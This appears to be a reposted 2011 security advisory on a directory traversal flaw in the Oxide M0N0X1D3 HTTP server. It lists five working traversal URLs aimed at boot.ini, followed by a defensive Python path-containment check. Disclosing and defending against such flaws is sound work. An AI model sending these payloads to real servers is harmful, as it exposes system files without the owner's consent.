

Additional information

  Directory traversal in the Oxide M0N0X1D3 HTTP server

From: demonalex_(at)_163.com <demonalex_(at)_163.com>
Date: December 5, 2011
Subject: Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability

Title : Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability
Software : Oxide M0N0X1D3 HTTP Server
Software Version : 20040223
Vendor: http://sourceforge.net/projects/oxide-ws/
Vulnerability Published : 2011-11-15
Vulnerability Update Time :
Status :
Impact : Medium
Bug Description :
Oxide M0N0X1D3 HTTP Server does not properly sanitise filenames containing directory traversal sequences that are received from an HTTP Browser.
Exploit :
****************************************************************
http://target/..\..\..\boot.ini
http://target/..\\..\\..\\boot.ini
http://target/..\/..\/..\/boot.ini
http://target//..\/..\/..\boot.ini
http://target/.\..\.\..\.\..\boot.ini
.
****************************************************************
Credits : This vulnerability was discovered by demonalex(at)163(dot)com
Pentester/Researcher
Dark2S Security Team/PolyU.HK
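
A server-side containment check that rejects the request paths listed in the advisory, as an added example (not code from the advisory or from the Oxide project). The document root `C:\www\htdocs` and the function name `resolve_request_path` are assumptions; `ntpath` is used so that Windows path rules apply on any platform.

```python
import ntpath
from urllib.parse import unquote

DOC_ROOT = r"C:\www\htdocs"  # constructed document root (assumption)

# Request paths quoted from the advisory above.
ADVISORY_PATHS = [
    r"/..\..\..\boot.ini",
    r"/..\\..\\..\\boot.ini",
    r"/..\/..\/..\/boot.ini",
    r"//..\/..\/..\boot.ini",
    r"/.\..\.\..\.\..\boot.ini",
]


def resolve_request_path(url_path, doc_root=DOC_ROOT):
    """Return the normalized file path under doc_root, or None if it escapes."""
    # Decode percent-escapes once, before any path handling.
    decoded = unquote(url_path)
    if "\x00" in decoded:
        return None
    # Windows treats '/' and '\' alike, so fold both into one separator
    # and drop leading separators (they would otherwise re-root the join).
    relative = decoded.replace("/", "\\").lstrip("\\")
    # A drive prefix such as "C:" makes join() discard the document root.
    if ntpath.splitdrive(relative)[0]:
        return None
    root = ntpath.normcase(ntpath.normpath(doc_root))
    # normpath collapses ".", ".." and repeated separators; only the
    # normalized result is compared against the root.
    candidate = ntpath.normcase(ntpath.normpath(ntpath.join(root, relative)))
    if candidate != root and not candidate.startswith(root + "\\"):
        return None
    return candidate


def check_advisory_paths():
    """Map each advisory path to the resolver's verdict (None = rejected)."""
    return {p: resolve_request_path(p) for p in ADVISORY_PATHS}


if __name__ == "__main__":
    for path, result in check_advisory_paths().items():
        print(f"{path!r:40} -> {result}")
    print(resolve_request_path("/docs/../index.html"))
```

The decision is made on the normalized path rather than by searching the raw request for `../`, which is why the mixed `\`, `\\`, `\/` and `.\` forms are all handled by the same check.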

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod